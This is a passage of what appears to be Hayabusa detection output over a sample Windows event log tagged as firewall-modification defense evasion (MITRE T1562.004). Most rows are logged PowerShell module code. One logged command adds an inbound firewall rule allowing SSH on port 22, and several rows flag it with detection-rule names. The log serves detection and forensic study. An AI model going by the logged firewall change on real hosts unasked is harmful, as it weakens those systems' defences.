$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) 
{ [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair 
Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.533 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.535 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.535 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" 
ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( 
[Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if 
($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = 
[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper 
$PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias 
'*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.556 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.556 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.557 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.683 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:46.214 +09:00,srvdefender01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:46.469 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(New-NetFirewallRule): ""New-NetFirewallRule"" ParameterBinding(New-NetFirewallRule): name=""Name""; value=""sshd"" ParameterBinding(New-NetFirewallRule): name=""DisplayName""; value=""OpenSSH Server (sshd)"" ParameterBinding(New-NetFirewallRule): name=""Enabled""; value=""True"" ParameterBinding(New-NetFirewallRule): name=""Direction""; value=""Inbound"" ParameterBinding(New-NetFirewallRule): name=""Protocol""; value=""TCP"" ParameterBinding(New-NetFirewallRule): name=""Action""; value=""Allow"" ParameterBinding(New-NetFirewallRule): name=""LocalPort""; value=""22"" ParameterBinding(New-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(New-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(New-NetFirewallRule): name=""Description""; value="""" ParameterBinding(New-NetFirewallRule): name=""Group""; value="""" ParameterBinding(New-NetFirewallRule): name=""LooseSourceMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""LocalOnlyMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""Owner""; value="""" ParameterBinding(New-NetFirewallRule): name=""Program""; value="""" ParameterBinding(New-NetFirewallRule): name=""Package""; value="""" ParameterBinding(New-NetFirewallRule): name=""Service""; value="""" ParameterBinding(New-NetFirewallRule): name=""LocalUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteMachine""; value="""" ParameterBinding(New-NetFirewallRule): name=""OverrideBlockRules""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(New-NetFirewallRule): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:46.471 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?sshd"", PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:46.472 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:46.475 